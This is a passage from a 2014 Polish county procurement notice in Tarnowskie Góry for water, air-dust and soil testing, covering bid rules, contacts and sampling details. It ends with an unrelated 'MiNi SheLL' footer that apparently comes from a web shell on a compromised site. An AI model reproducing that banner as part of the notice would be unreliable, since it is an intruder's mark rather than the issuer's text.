7. Wykonawca może złożyć tylko jedną ofertę dla każdej części zamówienia.
8. Ofertę składa się pod rygorem nieważności w formie pisemnej.
9. Treść oferty musi odpowiadać treści SIWZ.
10. Oferta musi być sporządzona w języku polskim w jednym egzemplarzu.
11. Rozliczenia między Zamawiającym a Wykonawcą będą prowadzone w złotych polskich.
12. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W tym przypadku ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wykonawcy ci przed podpisaniem umowy w sprawie zamówienia publicznego będą zobowiązani do przedstawienia umowy regulującej ich współpracę.
13. Zamawiający nie przewiduje zawarcia umowy ramowej.
14. Zamawiający nie przewiduje aukcji elektronicznej.
15. Zamawiający nie przewiduje zwrotu kosztów postępowania za wyjątkiem regulacji art. 93 ust.4 ustawy.
16. Zamawiający nie ustanawia dynamicznego systemu zakupów. 
17. Wszystkie załączniki są integralną częścią SIWZ.
18. Zamawiający nie przewiduje wymagań, o których mowa w art. 29 ust. 4 ustawy.
19. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych części zamówienia. Zamawiający żąda wskazania przez wykonawcę części zamówienia, której wykonanie zamierza powierzyć podwykonawcy, lub podania przez wykonawcę nazw (firm) podwykonawców, na których zasoby wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy.
20. Jeżeli zmiana lub rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust.1, wykonawca jest zobowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
21. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.
22. Wykonawca określi cenę oferty brutto, która stanowić będzie wynagrodzenie za realizację zamówienia, podając ją w zapisie liczbowym i słownie z dokładnością do dwóch miejsc po przecinku. Cena oferty brutto jest ceną ostateczną obejmującą wszystkie koszty i składniki związane z realizacją zamówienia, w tym m.in. podatek VAT, upusty, rabaty. Cena musi być wyrażona w złotych polskich niezależnie od wchodzących w jej skład elementów
23. Oferta musi być sporządzona w języku polskim w jednym egzemplarzu. Ofertę należy złożyć w formie pisemnej (maszynowej lub ręcznej - zaleca się ręczne wypisanie załącznika nr 1 i / lub nr 2 i / lub nr 3 do SIWZ tj. formularza ofertowego). Wszystkie strony oferty powinny być zaparafowane lub podpisane przez osobę  upoważnioną do występowania w imieniu wykonawcy. Wszystkie strony powinny być ponumerowane a oferta spięta w całość. Wykonawca ponosi koszty sporządzania  oferty, w tym także ewentualne koszty tłumaczenia dokumentów czy też oświadczeń załączonych do oferty na język polski.
24. Oferta musi być sporządzona w języku polskim, w 1 egzemplarzu, mieć formę pisemną i format nie większy niż A4. Arkusze o większych formatach należy złożyć do formatu A4. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
25. Wszystkie zapisane strony oferty powinny być ponumerowane. Strony te powinny być parafowane przez osobę (lub osoby jeżeli do reprezentowania Wykonawcy upoważnione są dwie lub więcej osób) podpisującą (podpisujące) ofertę zgodnie z treścią dokumentu określającego status prawny Wykonawcy lub treścią załączonego do oferty pełnomocnictwa. Strony zawierające informacje nie wymagane przez Zamawiającego (np.: prospekty reklamowe o firmie, jej działalności, itp.) nie muszą być numerowane i parafowane. Wszelkie miejsca w ofercie, w których Wykonawca naniósł poprawki lub zmiany wpisywanej przez siebie treści (czyli wyłącznie w miejscach, w których jest to dopuszczone przez Zamawiającego) muszą być parafowane przez osobę (osoby) podpisującą (podpisujące) ofertę. Dokumenty wchodzące w skład oferty mogą być przedstawiane w formie oryginałów lub poświadczonych przez Wykonawcę za zgodność z oryginałem kopii, za wyjątkiem pełnomocnictw które należy złożyć w oryginale lub kopii potwierdzonej za zgodność z oryginałem przez notariusza lub mocodawcę. 
26. Postępowanie jest prowadzone w formie pisemnej w języku polskim. Wszelką korespondencję przesyłaną faksem lub emailem uważa się za złożoną w terminie, jeśli jej treść dotarła do adresata przed upływem terminu i została niezwłocznie potwierdzona pismem przesłanym za pośrednictwem poczty lub złożonym w kancelarii Starostwa Powiatowego w Tarnowskich Górach. Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania. Każdy Wykonawca może zwrócić się, do Zamawiającego o wyjaśnienie treści SIWZ.
27. Wyjaśnień udzielają:
1) w kwestiach formalnych - pracownik Zamówień Publicznych: Iwona Penkaty - tel. (+48 32) 381-37-86
2) w kwestiach merytorycznych 
a) mgr Jacek Bernacik - powietrze, tel. (+48 32) 381 37 45
b) mgr Danuta Kostoń - woda   tel.  (+48 32) 381 37 41
c) mgr inż. Krzysztof Horzela - gleba tel. (+48 32) 381 37 46
28. Zamawiający oświadcza, że nie przewiduje spotkania z wykonawcami
29. Otwarcie ofert nastąpi w Starostwie Powiatowym w Tarnowskich Górach przy ul. Karłuszowiec 5 
w dniu 27 października 2014 r. o godzinie 10:00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Badanie wód powierzchniowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. BADANIA WÓD POWIERZCHNIOWYCH obejmujące pobór prób wody, wykonanie analiz i opracowanie wyników w zestawieniu z dopuszczalnymi wartościami poszczególnych badanych wskaźników wynikających z obowiązujących przepisów prawa.
2. Miejsce poboru prób wody, zakres i częstotliwość badań: 
1) 3 punkty pomiarowe:
a) Brzeźnica - w miejscowości: Tworóg, na odcinku ujściowym do Stoły (most na drodze nr 11 Tarnowskie Góry - Tworóg) (współrzędne w układzie 2000: X- 6550993,47, Y- 5599149,84
b) Potok Pniowiecki - w miejscowości: Tarnowskie Góry - Strzybnica, na odcinku ujściowym do Stoły (most na drodze leśnej stanowiącej przecznicę do drogi z miejscowości Boruszowice - Strzybnica) (współrzędne w układzie 2000: X- 6556038,72, Y- 5595699,53
c) Potok Ożarowicki - w miejscowości: Niezdara, na odcinku ujściowym do Brynicy (most na drodze polnej stanowiącej przecznicę do drogi nr 78 Świerklaniec - Tąpkowice) (współrzędne w układzie 2000: X- 6570912,03, Y- 5592519,15),
2) Zakres badań miesięcznych (okres poboru: 1 x miesiąc): temperatura wody, zapach, barwa, zawiesiny ogólne, odczyn, tlen rozpuszczony, BZT5, ChZTMn, ogólny węgiel organiczny, przewodność elektrolityczna, substancje rozpuszczone, siarczany, chlorki, wapń, magnez, azot amonowy, azot Kjeldahla, azot azotanowy, azot ogólny, fosfor ogólny,
3) Zakres badań kwartalnych (okres poboru: 1 x kwartał): bar, bor, cynk, miedź, kadm, ołów, rtęć.
3. Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 10 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.71.15.00-9, 90.71.45.00-0, 90.71.50.00-2, 90.73.00.00-3, 90.73.31.00-5, 90.74.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Badanie powietrza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. BADANIA POWIETRZA obejmujące opad pyłu wraz z metalami ciężkimi: arsen, kadm, ołów cynk i tal, wykonanie analiz i opracowanie wyników w zestawieniu z dopuszczalnymi wartościami poszczególnych badanych wskaźników wynikających z obowiązujących przepisów prawa.
2. Do zadań wykonawcy należeć będzie:
1) zorganizowanie 9 punktów pomiarowych w 9 gminach o współrzędnych określonych w tabeli w załaczniku nr 11 do SIWZ, zgodnie z metodologią badań. 
2) interpretacja wyników, w oparciu o przepisy prawa.
3. Częstotliwość poboru prób i zakres badań:
1) Pobór prób: jeden pomiar w miesiącu w 9 punktach (w 9 gminach powiatu tarnogórskiego wraz z oznaczeniem metali ciężkich w przeciągu 4 lat (432 pomiarów). Punkty pomiarowe zostały wyznaczone i określono im współrzędne w układzie współrzędnych 2000. Metodykę badań należy przeprowadzić w oparciu o rozporządzenie Ministra Środowiska z dnia 26 styczeń 2010 roku w sprawie wartości odniesienia dla niektórych substancji w powietrzu (Dz. U. z 2010 roku Nr 16 poz. 87) i inne obowiązujące akty prawne.
2) Zakres oznaczeń wskaźników zanieczyszczeń: Opad pyłu wraz z oznaczeniem w pyle zawartości: arsenu, kadmu, ołowiu, cynku, talu.
4. Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 11 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.71.15.00-9, 90.71.45.00-0, 90.71.50.00-2, 90.73.00.00-3, 90.73.14.00-4, 90.74.00.00-6, 90.73.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Badanie gleb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. BADANIA GLEB obejmujące pobór prób i wykonanie analiz. 
2. Miejsce poboru prób gleby, zakres i częstotliwość badań: ogółem 350 prób na terenie 9 gmin.
3. Pobór prób wykonywany zgodnie z zaleceniami zawartymi w opracowaniu autorstwa: Tomasz Stuczyński, Grzegorz Siebielec, Barbara Maliszewska-Kordybach, Bożena Smreczak, Leszek Gawrysiak. pt. Wyznaczanie obszarów na których przekroczone są standardy jakości gleb Poradnik metodyczny dla administracji i PN-R-04031 Analiza chemiczno - rolnicza gleby. Pobieranie próbek, oraz w oparciu o informacje i wskazówki analityczne z publikacji Ostrowska A., Gawlińska S., Szczubiałka Z. Metody analizy i oceny właściwości gleb i roślin IOŚ Warszawa 1991 r.
Punkty winny zostać przypisane do grup rodzajów gruntów zgodnie z § 2 Rozporządzenia z dnia 9 września 2002 roku w sprawie standardów jakości gleby oraz standardów jakości ziemi (Dz. U. z 2002 r. Nr  165, poz. 1359). W stosunku do  § 2 pkt 3 w/w rozporządzenia - grupa C (tereny przemysłowe, użytki kopalne, tereny komunikacyjne), w szczególności należy rozumieć:
1) tereny przemysłowe -  jako teren na którym prowadzona jest lub była działalność gospodarcza,
2) tereny komunikacyjne - w rozumieniu art. 4 pkt od 1 do 11 ustawy o drogach, tereny kolejowe, parkingi.
4. Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 12 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.71.15.00-9, 90.71.45.00-0, 90.71.50.00-2, 90.73.00.00-3, 90.74.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com